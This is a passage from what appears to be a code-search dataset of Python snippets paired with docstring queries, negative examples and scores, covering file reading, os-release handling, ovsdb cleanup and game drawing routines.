+ str(currentIndex) + \".tvInfo\", \"r\")\n data = handle.read() #reading description\n handle.close()\n return data", "def read_file(self, currentIndex):\n handle = open(\"Program Files\\\\TvInfo\\\\\" + str(currentIndex) + \".tvInfo\", \"r\")\n data = handle.read() #reading description\n handle.close()\n return data", "def freedesktop_os_release():\n global _os_release_cache\n\n if _os_release_cache is None:\n errno = None\n for candidate in _os_release_candidates:\n try:\n with open(candidate, encoding=\"utf-8\") as f:\n _os_release_cache = _parse_os_release(f)\n break\n except OSError as e:\n errno = e.errno\n else:\n raise OSError(\n errno,\n f\"Unable to read files {', '.join(_os_release_candidates)}\"\n )\n\n return _os_release_cache.copy()", "def read_local_file(filename):\n import fsspec\n fs = fsspec.filesystem('file')\n\n with fs.open(filename) as f:\n data = loads(f.read())\n\n return data", "def local_read(filename):\n full_filename = os.path.join(\n os.path.abspath(os.path.dirname(__file__)),\n filename)\n return codecs.open(full_filename, 'r', 'utf-8').read()", "def ReadVersion():\n return _ReadNumericFile(pathutils.JOB_QUEUE_VERSION_FILE)", "def readLib(self):\n\t\tdata = self._fileSystem.readLib()\n\t\tif data is None:\n\t\t\treturn\n\t\treturn data", "def read_file():\n with open(FILE_NAME) as f:\n data = f.read()\n return data", "def read_file(self):\n self._apply_shared_lock()\n\n self.handle = self._open_file_r()\n out = self._deserialize(self.handle)\n self.handle.close()\n\n self._release_lock()\n\n return out", "def open_and_read_file():\n file_path = sys.argv[1]\n #print file_path\n file_data = open(file_path, 'r')\n gettysburg = file_data.read()\n\n return gettysburg", "def data_file(self, path):\n return open(os.path.join(self.resource_path, path)).read()", "def read(self, filename):\r\n with temporary_file() as fp:\r\n os.unlink(fp.name)\r\n if self._call(\"-copyToLocal\", filename, fp.name) == 0:\r\n with open(fp.name) as f:\r\n return f.read()\r\n else:\r\n return None", "def _read_file(self) -> str:\n with open(self._file_name) as fp:\n return fp.read()", "def get(self, filename, **kw):\n\n file_path = os.path.join(self.storage_path, filename)\n try:\n file_obj = open(file_path, \"r\")\n except IOError:\n return\n else:\n return file_obj.read()", "def read(cls):\n x_i=\"vas.txt\"\n with open(x_i, 'r')as txt_file:\n file = txt_file.read()\n return file", "def get_content(self):\n version_file = self.wp_path + '/wp-includes/version.php'\n\n if (self.host == None and self.user == None):\n with open(version_file) as versionfile:\n return versionfile.read()\n\n from connection import SSHClient\n with SSHClient(self.host, self.user) as conn:\n return conn.readfile(version_file)", "def read(rel_path):\n here = os.path.abspath(os.path.dirname(__file__))\n with open(os.path.join(here, rel_path), \"r\") as fp:\n return fp.read()", "def _GetFileContents(filename):\n fpath = os.path.join(PROGRAM_FILES_DIR, filename)\n if os.path.isfile(fpath):\n with open(fpath, 'r') as f:\n content = f.read()\n else:\n content = pkgutil.get_data('gslib', filename)\n fpath = None\n if content is not None:\n if sys.version_info.major > 2 and isinstance(content, bytes):\n content = content.decode('utf-8')\n content = content.strip()\n return (fpath, content)", "def get_file_data(filename):", "def get_data_from_storage(data_file):\n print(f\"{CR}Yipes, I don't know how to pull data from dvc yet{C0}\")", "def read(path):", "def read(fname):\n f = fabio.open(fname)\n data = f.data\n del f; # close file\n return data", "def read(self):\n\t\tself.file.seek(0)\n\t\treturn self.file.read().strip()" ]
[ "0.6877728", "0.6081906", "0.6046769", "0.6038422", "0.60357785", "0.6028265", "0.6022373", "0.6018158", "0.60076445", "0.59902287", "0.593641", "0.589239", "0.5883661", "0.587215", "0.5849723", "0.5803643", "0.5778237", "0.57766265", "0.5729708", "0.5707521", "0.5704802", "0.5701879", "0.5695572", "0.5690179", "0.5680807", "0.5660659", "0.56528914", "0.5640892", "0.56310564", "0.5579904" ]
0.68287444
1
Copy a given osrelease file to /etc/osrelease.
def copy_os_release_file(dut, fname=default_os_release_file): # src = os.path.join(os.path.sep, 'shared', os_release_files_dir, fname) dst = os.path.join(os.path.sep, 'etc', 'os-release') dut("/bin/cp /tmp/files/os_releases/" + fname + " " + dst, shell="bash")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_os_release_file(**kwargs):\n\n LOGGER.info(\"Doing pre-flight checks\")\n\n releases_repo_url = OPENSTACK_REPOS + '/releases.git'\n releases_folder = kwargs['workdir'] + '/releases'\n\n oa_folder = kwargs['workdir'] + '/openstack-ansible'\n click.confirm((\"Are your sure your {} folder is properly \"\n \"checked out at the right version?\").format(oa_folder),\n abort=True)\n\n # Args validation\n if kwargs['branch'] not in VALID_CODE_NAMES:\n raise SystemExit(\"Invalid branch name {}\".format(kwargs['branch']))\n\n # Version validation\n if kwargs['version'] == \"auto\":\n fpth, version = get_oa_version(oa_folder)\n LOGGER.info(\"Version {} found in {}\".format(version, fpth))\n if version == \"master\":\n raise SystemExit(\"You should not release from a moving target\")\n else:\n version = kwargs['version']\n\n pre_release = (version.endswith(PRE_RELEASE_PREFIXES))\n\n if not pre_release:\n # For extra safety, ensure it's semver.\n try:\n semver_res = semver.parse(version)\n except Exception as exc:\n raise SystemExit(exc)\n major_version = semver_res['major']\n else:\n major_version = int(version.split(\".\")[0])\n\n if major_version != VALID_CODE_NAMES[kwargs['branch']]:\n raise SystemExit(\"Not a valid number for this series\")\n # Args validation done.\n\n yaml = YAML()\n oa = Repo(oa_folder)\n head_commit = oa.head.commit\n LOGGER.info(\"OpenStack-Ansible current SHA {}\".format(head_commit))\n if os.path.lexists(releases_folder):\n click.confirm('Deleting ' + releases_folder + '. OK?', abort=True)\n shutil.rmtree(releases_folder)\n releases_repo = Repo.clone_from(\n url=releases_repo_url,\n to_path=releases_folder,\n branch=\"master\")\n\n LOGGER.info(\"Reading ansible-role-requirements\")\n arr, _, _ = load_yaml(kwargs['workdir'] + ARR_PATH)\n\n LOGGER.info(\"Reading releases deliverable for the given branch\")\n deliverable_file_path = ('deliverables/' + kwargs['branch'] +\n '/openstack-ansible.yaml')\n deliverable_file = releases_folder + \"/\" + deliverable_file_path\n deliverable, ind, bsi = load_yaml(deliverable_file)\n\n # if no releases yet (start of cycle), prepare releases, as a list\n if not deliverable.get('releases'):\n deliverable['releases'] = []\n\n # Ensure the new release is last\n deliverable['releases'].append(\n {'version': \"{}\".format(version),\n 'projects': []}\n )\n\n # Now we can build in the order we want and still keep std dicts\n deliverable['releases'][-1]['projects'].append(\n {'repo': 'openstack/openstack-ansible',\n 'hash': \"{}\".format(head_commit)}\n )\n\n # Select OpenStack Projects and rename them for releases.\n # Keep their SHA\n regex = re.compile('^' + OPENSTACK_REPOS + '/.*')\n for role in arr:\n if regex.match(role['src']):\n deliverable['releases'][-1]['projects'].append(\n {'repo': urlparse(role['src']).path.lstrip('/'),\n 'hash': role['version']}\n )\n\n with open(deliverable_file, 'w') as df_h:\n yaml.explicit_start = True\n yaml.block_seq_indent = bsi\n yaml.indent = ind\n yaml.dump(deliverable, df_h)\n LOGGER.info(\"Patched!\")\n\n if kwargs['commit']:\n message = \"\"\"Release OpenStack-Ansible {}/{}\n\n \"\"\".format(kwargs['branch'], version)\n releases_repo.index.add([deliverable_file_path])\n releases_repo.index.commit(message)", "def get_os_release(release_file=constants.OS_RELEASE_FILE):\n linux_distro = ('', '', '')\n\n try:\n with open(release_file, 'r') as f:\n data = f.read()\n linux_distro = (\n _get_key_from_file(data, 'ID'),\n _get_key_from_file(data, 'VERSION'),\n '')\n except Exception as e:\n raise exception.SysinvException(_(\n \"Failed to open %s : %s\") % (release_file, str(e)))\n\n if linux_distro[0] == '':\n raise exception.SysinvException(_(\n \"Could not determine os type from %s\") % release_file)\n\n # Hint: This code is added here to aid future unit test.\n # Probably running unit tests on a non-supported OS (example at\n # time of writing: ubuntu), which is perfect, because code reaching\n # here will fail, and we just identified a place that would split\n # logic between OSs. The failing tests should mock this function\n # (get_os_release) for each supported OS.\n if linux_distro[0] not in constants.SUPPORTED_OS_TYPES:\n raise exception.SysinvException(_(\n \"Unsupported OS detected %s\") % linux_distro[0])\n\n return linux_distro", "def get_os_release(path):\n try:\n with open(path) as f:\n data = dict(l.strip().split('=', 1) for l in f.readlines() if '=' in l)\n return OSRelease(\n release_id=data.get('ID', '').strip('\"'),\n name=data.get('NAME', '').strip('\"'),\n pretty_name=data.get('PRETTY_NAME', '').strip('\"'),\n version=data.get('VERSION', '').strip('\"'),\n version_id=data.get('VERSION_ID', '').strip('\"'),\n variant=data.get('VARIANT', '').strip('\"') or None,\n variant_id=data.get('VARIANT_ID', '').strip('\"') or None\n )\n except IOError as e:\n reporting.report_generic(\n title='Error while collecting system OS facts',\n summary=str(e),\n severity='high',\n flags=['inhibitor'])\n return None", "def get_os_release(path):\n try:\n with open(path) as f:\n data = dict(l.strip().split('=', 1) for l in f.readlines() if '=' in l)\n return OSRelease(\n release_id=data.get('ID', '').strip('\"'),\n name=data.get('NAME', '').strip('\"'),\n pretty_name=data.get('PRETTY_NAME', '').strip('\"'),\n version=data.get('VERSION', '').strip('\"'),\n version_id=data.get('VERSION_ID', '').strip('\"'),\n variant=data.get('VARIANT', '').strip('\"') or None,\n variant_id=data.get('VARIANT_ID', '').strip('\"') or None\n )\n except IOError as e:\n raise StopActorExecutionError(\n message='Cannot collect the system OS facts.',\n details={'details': str(e)}\n )", "def _autoconfig_backup_file(filename):\n\n # Does a copy of the file exist, if not create one\n ofile = filename + \".orig\"\n (ret, stdout, stderr) = VPPUtil.exec_command(\"ls {}\".format(ofile))\n if ret != 0:\n logging.debug(stderr)\n if stdout.strip(\"\\n\") != ofile:\n cmd = \"sudo cp {} {}\".format(filename, ofile)\n (ret, stdout, stderr) = VPPUtil.exec_command(cmd)\n if ret != 0:\n logging.debug(stderr)", "def _copy_asoundconf(asoundconf_file):\n this_dir, this_filename = os.path.split(__file__)\n asoundconf_path = os.path.join(this_dir, MicrophoneSetup.ASOUNDCONF_PATH, asoundconf_file)\n shutil.copy2(asoundconf_path, ASOUNDCONF_DEST_PATH)", "def read_os_release_file(dut, fname=default_os_release_file, key=None):\n cur_dir, f = os.path.split(__file__)\n path = os.path.join(cur_dir, os_release_files_dir, fname)\n d = {}\n with open(path) as f:\n for line in f:\n k, v = line.rstrip().split(\"=\")\n d[k] = v\n if key:\n return d[key]\n else:\n return d", "def replace_file(filename, contents):\n filename = path.join(PATH_ROOT, filename)\n filename_bak = \"%s.release.bak\" % filename\n os.rename(filename, filename_bak)\n with open(filename, \"w\") as out_file:\n out_file.write(\"\".join(contents))\n shutil.copymode(filename_bak, filename)\n os.remove(filename_bak)", "def etc(c):\n utils.new_release(\n conn,\n deploy_root=SALT_DEPLOY_PATH,\n in_repo_path=\"etc\",\n release_path=\"/etc/salt\",\n branch=SALT_BRANCH,\n )\n conn.sudo(\"systemctl restart salt-master\", pty=True)", "def get_host_ubuntu_release():\r\n with open('/etc/lsb-release') as config:\r\n for line in config:\r\n k, v = line.split('=')\r\n\r\n if k == 'DISTRIB_CODENAME':\r\n return v.strip(string.whitespace + '\\'\"')\r\n\r\n raise ValueError('Corrupt release information.')", "def create_config_file(original_file, copy_file):\n copy(original_file, copy_file)", "def add_source(name, source_url, section):\n # lsb_release is not installed in most docker images by default\n distro = (\n subprocess.check_output(\n [\"/bin/bash\", \"-c\", \"source /etc/os-release && echo ${VERSION_CODENAME}\"],\n stderr=subprocess.STDOUT,\n )\n .decode()\n .strip()\n )\n line = f\"deb {source_url} {distro} {section}\\n\"\n with open(os.path.join(\"/etc/apt/sources.list.d/\", name + \".list\"), \"a+\") as f:\n # Write out deb line only if it already doesn't exist\n f.seek(0)\n if line not in f.read():\n f.write(line)\n f.truncate()\n utils.run_subprocess([\"apt-get\", \"update\", \"--yes\"])", "def copy_supervisor_file():\n\n # check if the supervisor file exists\n if not os.path.isfile(\"./text_embeddings.conf\"):\n return Exception(\"File text_embeddings.conf does not exist\")\n\n # otherwise check if the supervisor folder exists\n if not os.path.exists(\"/etc/supervisor/conf.d\"):\n return Exception(\"Supervisor is not installed or folder /etc/supervisor/conf.d does not exist\")\n\n # copy the file to the final destination\n copyfile(\"./text_embeddings.conf\", \"/etc/supervisor/conf.d/text_embeddings.conf\")", "def __upgrade_install__(path, release):\n install = Popen([\"freebsd-update\", \"-b\", path, \"-d\",\n \"{}/var/db/freebsd-update/\".format(path), \"-f\",\n \"{}/etc/freebsd-update.conf\".format(path), \"-r\",\n release, \"install\"], stderr=PIPE)\n install.communicate()\n\n return install.returncode", "def copy_file(va_bucket, or_bucket, uuid):\n key = va_bucket.get_key(uuid)\n metadata = key.metadata\n header_data = {\"Content-Type\": key.content_type }\n print(\" {0} to OR\".format(uuid))\n or_bucket.copy_key(uuid, VA_BUCKET_NAME, uuid, headers=header_data, metadata=metadata)", "def symlink_current_release():\n require(\"release\", provided_by=[deploy])\n with cd(\"%(path)s/releases\" % env):\n sudo(\"ln -s %(release)s current_tmp && mv -Tf current_tmp current\" % env)", "def cp_to_file(fn0, fn):\n\n # keep rewriting attributes\n shutil.copyfile(fn0, fn)", "def replace_write(filename, destination):\n if not os.path.isfile(filename):\n print \"WARNING: File not found at %s, skipping write\" % filename\n return\n\n with open(filename, 'r') as infile:\n content = infile.read()\n content_expanded = re.sub(ENV_PATTERN, lambda match: env(match.group(1)), content)\n mkpath(os.path.dirname(os.path.realpath(destination)))\n with open(destination, 'w') as outfile:\n outfile.write(content_expanded)", "def put(self, src, dst):\r\n abs_src = os.path.expanduser(src)\r\n assert os.path.exists(abs_src), 'File does not exist, cannot copy: %s' % abs_src\r\n return self._do_put(abs_src, dst)", "def copy_file(src, dest):\n logger.debug(\"Copying %s to %s\", src, dest)\n try:\n shutil.copy(src, dest)\n except (OSError, IOError) as exc:\n logger.debug('Installation error, trying sudo.')\n try:\n check_call(['sudo', 'cp', src, dest])\n except HelperError:\n # That failed too - re-raise the original exception\n raise exc\n return True", "def build_specfile(target, source, env):\n with open(target[0].get_abspath(), 'w') as ofp:\n try:\n ofp.write(build_specfile_header(env))\n ofp.write(build_specfile_sections(env))\n ofp.write(build_specfile_filesection(env, source))\n\n # call a user specified function\n if 'CHANGE_SPECFILE' in env:\n env['CHANGE_SPECFILE'](target, source)\n\n except KeyError as e:\n raise SCons.Errors.UserError('\"%s\" package field for RPM is missing.' % e.args[0])", "def move_hosts_file_into_place(final_file): # noqa: W605\n\n filename = os.path.abspath(final_file.name)\n\n try:\n if not Path(filename).exists():\n raise FileNotFoundError\n except Exception:\n print_failure(f\"{filename} does not exist.\")\n return False\n\n if platform.system() == \"Windows\":\n target_file = str(Path(os.getenv(\"SystemRoot\")) / \"system32\" / \"drivers\" / \"etc\" / \"hosts\")\n else:\n target_file = \"/etc/hosts\"\n\n if os.getenv(\"IN_CONTAINER\"):\n # It's not allowed to remove/replace a mounted /etc/hosts, so we replace the content.\n # This requires running the container user as root, as is the default.\n print(f\"Running in container, so we will replace the content of {target_file}.\")\n try:\n with open(target_file, \"w\") as target_stream:\n with open(filename, \"r\") as source_stream:\n source = source_stream.read()\n target_stream.write(source)\n return True\n except Exception:\n print_failure(f\"Replacing content of {target_file} failed.\")\n return False\n elif platform.system() == \"Linux\" or platform.system() == \"Windows\" or platform.system() == \"Darwin\":\n print(\n f\"Replacing {target_file} requires root privileges. You might need to enter your password.\"\n )\n try:\n subprocess.run(SUDO + [\"cp\", filename, target_file], check=True)\n return True\n except subprocess.CalledProcessError:\n print_failure(f\"Replacing {target_file} failed.\")\n return False", "def copy_file(file: str, dest: str) -> None:\n\tuux.show_debug(\"Copying \" + str(file) + \" => \" + str(dest))\n\tshutil.copy2(file, dest)", "def copybin(src, dst, proc, par):\n filename = 'proc%06d_%s.bin' % (proc, par)\n copyfile(join(src, filename), join(dst, filename))", "def copy_file(rpath, rootdir, repodir, repo_file=None):\n\n if repo_file is None:\n repo_file = os.path.join(repodir, rpath)\n dirname = os.path.dirname(repo_file)\n if dirname and not os.path.isdir(dirname):\n os.makedirs(dirname)\n etc_file = os.path.join(rootdir, rpath)\n # Remove destination if source is a symlink or if destination is a symlink\n # (in the last case, source would be copied to the file pointed by\n # destination instead of having the symlink itself being copied).\n if os.path.lexists(repo_file) and (os.path.islink(etc_file) or\n os.path.islink(repo_file)):\n os.remove(repo_file)\n shutil.copy2(etc_file, repo_file, follow_symlinks=False)", "def copy_build():\n\n print 'Copying build file to Android assets directory...',\n\n src = BUILD_PATH + DB_NAME\n dst = ASSETS_PATH + DB_NAME\n \n shutil.copyfile(src, dst)\n \n print 'done.'", "def copyfile(self, source, outputfile):\n shutil.copyfileobj(source, outputfile)", "def copyfile(self, source, outputfile):\n shutil.copyfileobj(source, outputfile)", "def copyfile(self, source, outputfile):\n shutil.copyfileobj(source, outputfile)", "def make_release():\n parser = OptionParser()\n parser.add_option(\"-d\", \"--destination\", action=\"store\", type=\"string\", \n dest=\"destdir\",\n help=\"directory where distributions and docs will be placed\")\n parser.add_option(\"-v\", \"--version\", action=\"store\", type=\"string\", \n dest=\"version\",\n help=\"version string applied to all openmdao distributions\")\n parser.add_option(\"-m\", action=\"store\", type=\"string\", dest=\"comment\",\n help=\"optional comment for version tag\")\n parser.add_option(\"-b\", \"--basebranch\", action=\"store\", type=\"string\", \n dest=\"base\", default='master', \n help=\"base branch for release. defaults to master\")\n parser.add_option(\"-t\", \"--test\", action=\"store_true\", dest=\"test\",\n help=\"used for testing. A release branch will not be created\")\n parser.add_option(\"-n\", \"--nodocbuild\", action=\"store_true\", \n dest=\"nodocbuild\",\n help=\"used for testing. The docs will not be rebuilt if they already exist\")\n parser.add_option(\"--host\", action='append', dest='hosts', metavar='HOST',\n default=[],\n help=\"host from config file to build bdist_eggs on. \"\n \"Multiple --host args are allowed.\")\n parser.add_option(\"-c\", \"--config\", action='store', dest='cfg', \n metavar='CONFIG', default='~/.openmdao/testhosts.cfg',\n help=\"path of config file where info for hosts is located\")\n (options, args) = parser.parse_args(sys.argv[1:])\n \n if not options.version or not options.destdir:\n parser.print_help()\n sys.exit(-1)\n \n _check_version(options.version)\n\n options.cfg = os.path.expanduser(options.cfg)\n \n config = ConfigParser.ConfigParser()\n config.readfp(open(options.cfg))\n \n haswin = False\n for host in options.hosts:\n if host == 'localhost':\n if sys.platform.startswith('win'):\n haswin = True\n elif config.has_section(host):\n platform = config.get(host, 'platform')\n if platform == 'windows':\n haswin = True\n if not haswin:\n print \"no windows host was specified, so can't build binary eggs for windows\"\n sys.exit(-1)\n \n orig_branch = get_git_branch()\n if not orig_branch:\n print \"You must run mkrelease from within a git repository. aborting\"\n sys.exit(-1)\n\n if not options.test:\n if orig_branch != options.base:\n print \"Your current branch '%s', is not the specified base branch '%s'\" % (orig_branch, options.base)\n sys.exit(-1)\n \n if _has_checkouts():\n print \"There are uncommitted changes. You must run mkrelease.py from a clean branch\"\n sys.exit(-1)\n \n if orig_branch == 'master':\n print \"pulling master\"\n os.system(\"git pull origin master\")\n if _has_checkouts():\n print \"something went wrong during pull. aborting\"\n sys.exit(-1)\n else:\n print \"WARNING: base branch is not 'master' so it has not been\"\n print \"automatically brought up-to-date.\"\n answer = raw_input(\"Proceed? (Y/N) \")\n if answer.lower() not in [\"y\", \"yes\"]:\n sys.exit(-1)\n \n relbranch = \"release_%s\" % options.version\n if relbranch in get_git_branches():\n print \"release branch %s already exists in this repo\" % relbranch\n sys.exit(-1)\n\n print \"creating release branch '%s' from base branch '%s'\" % (relbranch, orig_branch)\n check_call(['git', 'branch', relbranch])\n print \"checking out branch '%s'\" % relbranch\n check_call(['git', 'checkout', relbranch])\n \n destdir = os.path.abspath(options.destdir)\n if not os.path.exists(destdir):\n os.makedirs(destdir)\n\n startdir = os.getcwd()\n topdir = repo_top()\n \n cfgpath = os.path.expanduser(options.cfg)\n \n try:\n _update_releaseinfo_files(options.version)\n \n # build the docs\n docdir = os.path.join(topdir, 'docs')\n idxpath = os.path.join(docdir, '_build', 'html', 'index.html')\n \n if not os.path.isfile(idxpath) or not options.nodocbuild:\n build_docs(argv=['-v', options.version])\n shutil.copytree(os.path.join(topdir,'docs','_build', 'html'), \n os.path.join(destdir,'docs'))\n\n if not options.test:\n # commit the changes to the release branch\n print \"committing all changes to branch '%s'\" % relbranch\n check_call(['git', 'commit', '-a', '-m', \n '\"updating releaseinfo files for release %s\"' % \n options.version])\n\n # build openmdao package distributions\n proj_dirs = []\n for project_name, pdir, pkgtype in openmdao_packages:\n pdir = os.path.join(topdir, pdir, project_name)\n if 'src' in os.listdir(pdir):\n os.chdir(os.path.join(pdir, 'src'))\n else:\n os.chdir(pdir)\n print 'building %s' % project_name\n _build_sdist(pdir, destdir, options.version)\n if pkgtype == 'bdist_egg':\n proj_dirs.append(pdir)\n \n os.chdir(startdir)\n _build_bdist_eggs(proj_dirs, destdir, options.hosts, cfgpath)\n \n print 'creating bootstrapping installer script go-openmdao.py'\n installer = os.path.join(os.path.dirname(__file__),\n 'mkinstaller.py')\n \n check_call([sys.executable, installer, '--dest=%s'%destdir])\n\n if options.comment:\n comment = options.comment\n else:\n comment = 'creating release %s' % options.version\n \n if options.test:\n _rollback_releaseinfo_files()\n else:\n # tag the current revision with the release version id\n print \"tagging release with '%s'\" % options.version\n check_call(['git', 'tag', '-f', '-a', options.version, '-m', comment])\n \n check_call(['git', 'checkout', orig_branch])\n print \"\\n*REMEMBER* to push '%s' up to the master branch if this release is official\" % relbranch\n \n print \"new release files have been placed in %s\" % destdir\n \n finally:\n os.chdir(startdir)" ]
[ "0.5891819", "0.5617878", "0.5600983", "0.54453236", "0.5412584", "0.5301226", "0.5192675", "0.5176676", "0.5082615", "0.50576097", "0.50236535", "0.5004781", "0.50029683", "0.49893183", "0.4973388", "0.49352297", "0.49307936", "0.4925656", "0.49127647", "0.49001563", "0.48605695", "0.4854662", "0.48353156", "0.4804392", "0.47576368", "0.47208738", "0.47136053", "0.47136053", "0.47136053", "0.46945816" ]
0.7919572
0
Remove the OpenSwitch DB from ovsdbserver. It also removes the DB file from the file system.
def stop_ovsdb(dut): # Remove the database from the ovsdb-server. dut(ovs_appctl + "-t ovsdb-server ovsdb-server/remove-db OpenSwitch", shell="bash") # Remove the DB file from the file system. dut("/bin/rm -f /var/run/openvswitch/ovsdb.db", shell="bash")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def db_remove():\n\n db.session.close()\n db.drop_all()\n\n path = current_app.config['SNER_VAR']\n for file_object in os.listdir(path):\n file_object_path = os.path.join(path, file_object)\n if os.path.isdir(file_object_path):\n shutil.rmtree(file_object_path)\n else:\n os.unlink(file_object_path)", "def drop_db(self):\n db_name = self.db.db_url.split('///')[1]\n if os.path.exists(db_name):\n os.remove(db_name)", "def delete_db(self):\n import os.path\n os.remove(self.filepath)", "def remove(self, db_name):\n path = self.get_path(db_name)\n os.remove(path)", "def removedb(dbname):\n os.system(\"dropdb %s\" % dbname)", "def remove():\n\n db_remove()", "def drop_db():\n database.db.reflect()\n database.db.drop_all()\n print('Dropped the database')", "def drop_db() -> None:\n \n if os.environ.get('DATABASE_URL').startswith('sqlite:///'):\n sqlite_s, sqlite_f = os.environ.get('DATABASE_URL').split(\"sqlite:///\") \n os.unlink(sqlite_f)\n else: \n Base.metadata.drop_all(bind=engine)", "def fd_remove(db_name):\n names = FdMultiController.fd_list()\n if db_name not in names:\n # nothing to do\n return\n names.remove(db_name)\n with open(\n FdMultiController._path_generator(FdMultiController._db_registry_name), \"wb\"\n ) as file:\n pickle.dump(names, file)\n os.remove(FdMultiController._path_generator(db_name))", "def delete():\n\n from slicr.extensions import db\n\n click.echo('deleting database...')\n\n db.drop_all()", "def tearDown(self):\n os.close(self.db_fd)\n os.unlink(closet.app.config['DATABASE'])", "def erase_db(file):\n open(file, 'w').close()", "def delete_db():\n db.drop_all()", "def cleanup(self):\n if os.path.exists(self._db):\n os.remove(self._db)", "def removedb():\n\n try:\n os.remove(rebasedb)\n except OSError:\n pass", "def tearDown(self):\n os.close(self.db_fd)\n os.unlink(app.app.config['DATABASE'])", "def tearDown(self):\n os.close(self.db_fd)\n os.unlink(pegasus.app.config['DATABASE'])", "def drop_database():\n drop_db(app)", "def deleteDB():\n db = sqlite.connect(db_path)\n db.row_factory = sqlite.Row\n cursor = db.cursor()\n cursor.execute(\"DELETE from rooms\")\n\n cursor.execute(\"DELETE from users\")\n\n cursor.execute(\"DELETE from urls\")\n\n cursor.fetchall()\n db.commit()\n cursor.close()\n db.close()", "def delete_database(self, name_or_obj):\n name = utils.get_name(name_or_obj)\n self._database_manager.delete(name)", "def tearDown(self):\n os.remove(self._dbfile)", "def dropdb():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()" ]
[ "0.7118374", "0.70850265", "0.6969073", "0.6936522", "0.6843543", "0.6600032", "0.6549064", "0.6437333", "0.6426025", "0.6383878", "0.636996", "0.63381946", "0.6297148", "0.62754035", "0.62196547", "0.6199373", "0.6198524", "0.6159389", "0.6147187", "0.61467093", "0.61348754", "0.6120796", "0.6067403", "0.6067403", "0.6067403", "0.6067403", "0.6067403", "0.6067403", "0.6067403", "0.6067403" ]
0.76180816
0
Draws range of tower if clicked on.
def draw_range(self, win): if self.selected: surface = pygame.Surface((self.range * 4, self.range * 4), pygame.SRCALPHA, 32) pygame.draw.circle(surface, (128, 128, 128, 100), (self.range, self.range), self.range, 0) win.blit(surface, (self.x - self.range, self.y - self.range))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def draw_bounds():\n\n pass", "def draw(self):\n if context.click():\n self.place()", "def draw(self):\n #for (x, y) in self.coords:\n # pyxel.rect(\n # (x + self.x) * 4,\n # (y + self.y) * 4,\n # (x + self.x) * 4 + 3,\n # (y + self.y) * 4 + 3,\n # self.color)", "def range(self, event):\r\n \r\n p = (event.x, self.toCartesian(event.y))\r\n \r\n if self.selectedRegion is None:\r\n self.selectedStart = Region(p[X],p[Y], p[X],p[Y])\r\n self.selectedRegion = self.selectedStart.unionPoint(p)\r\n \r\n self.paint()\r\n \r\n # return (node,sub-tree) where sub-tree is True if draining entire tree\r\n # rooted at node. Draw these as shaded red rectangle to identify whole\r\n # sub-tree is selected.\r\n for pair in self.tree.range(self.selectedRegion):\r\n p = pair[0].point\r\n \r\n if pair[1]:\r\n self.canvas.create_rectangle(pair[0].region.x_min, self.toTk(pair[0].region.y_min), \r\n pair[0].region.x_max, self.toTk(pair[0].region.y_max),\r\n fill='Red', stipple='gray12')\r\n else:\r\n self.canvas.create_rectangle(p[X] - BoxSize, self.toTk(p[Y]) - BoxSize, \r\n p[X] + BoxSize, self.toTk(p[Y]) + BoxSize, fill='Red')\r\n\r\n self.queryRect = self.canvas.create_rectangle(self.selectedRegion.x_min, self.toTk(self.selectedRegion.y_min), \r\n self.selectedRegion.x_max, self.toTk(self.selectedRegion.y_max), \r\n outline='Red', dash=(2, 4))", "def draw(self):\n if self.is_clicked:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 0)\n else:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 1)", "def onclick(self, event):\n # OPTIMIZE: create bar to offset and del this function\n if self.out_graph is False:\n\n if (event.button == 3 and event.xdata >= 0\n and event.xdata <= self.axe_X):\n self.offset_X += self.offset_X2\n self.offset_X2 = int(self.axe_X/2 - event.xdata - self.offset_X)\n self.img_debut = img_offset_X(self.img_debut, self.offset_X2)\n self.img2 = self.img_pixels(self.img_debut)\n self.ax.imshow(self.img2)\n self.fig.canvas.draw()", "def draw():", "def draw(self):", "def mousePressEvent(self, event):\n self.begin = event.pos()\n self.end = event.pos()\n self.update()", "def draw_walker(indx):\n chart_1.create_oval(hips[indx]-6, hips[indx+1]-6,hips[indx]+6, hips[indx+1]+6, fill= \"magenta\", width = 1, tag = 'line_1') \n chart_1.create_line(hips[indx], hips[indx+1], knee_a[indx], knee_a[indx+1], fill= \"blue\", width = 2, tag = 'line_1') \n chart_1.create_line(hips[indx], hips[indx+1], knee_b[indx], knee_b[indx+1], fill= \"green\", width = 2, tag = 'line_1') \n chart_1.create_line(knee_a[indx], knee_a[indx+1], heel_a[indx], heel_a[indx+1], fill= \"blue\", width = 2, tag = 'line_1') \n chart_1.create_line(knee_b[indx], knee_b[indx+1], heel_b[indx], heel_b[indx+1], fill= \"green\", width = 2, tag = 'line_1')", "def right_click_event(self, event):\n #print \"Clicked at %.1f %.1f\" %(event.x, event.y)\n #oval = self.canvas.create_oval(event.x-5, 10, event.x+5, 0, fill=\"red\", outline=\"blue\", width=1, tags=\"line tag\")\n #box = self.canvas.create_rectangle(event.x-5, -10, event.x+5, 10, fill=\"red\", outline=\"white\", width=1, tags=\"line tag\")\n \n #self.canvas.tag_raise(self.panel)\n for j in range(self.NREAD):\n if self.read_polygons[j].contains_point((event.x, event.y)):\n print('Read #%d!' %(j+1))\n \n self.marked_reads[self.i, j] = (not self.marked_reads[self.i, j])*1\n self.draw_lines()\n return None\n \n # if np.abs(self.marked_reads[self.i, j] - event.x) < 8:\n # self.marked_reads[self.i, j] = 0.\n # self.draw_lines()\n # return None\n \n # j = 0\n # while (self.marked_reads[self.i, j] > 0) & (j < 14):\n # j += 1\n # \n # self.marked_reads[self.i, j] = event.x*1.\n # \n # #print j, self.marked_reads[self.i,:]\n # self.draw_lines()\n return None", "def drawCells(self):\r\n self.drawing = not self.drawing\r\n if self.drawing:\r\n self.draw_button['text'] = \"No Draw\"\r\n else:\r\n self.draw_button['text'] = \"Draw\"", "def draw(self, win):\n img = self.tower_imgs\n win.blit(img, (self.x - img.get_width() // 2, self.y - img.get_height() // 2))\n\n if self.selected:\n self.menu.draw(win)", "def draw_t(self):\r\n pen.forward(20)\r\n 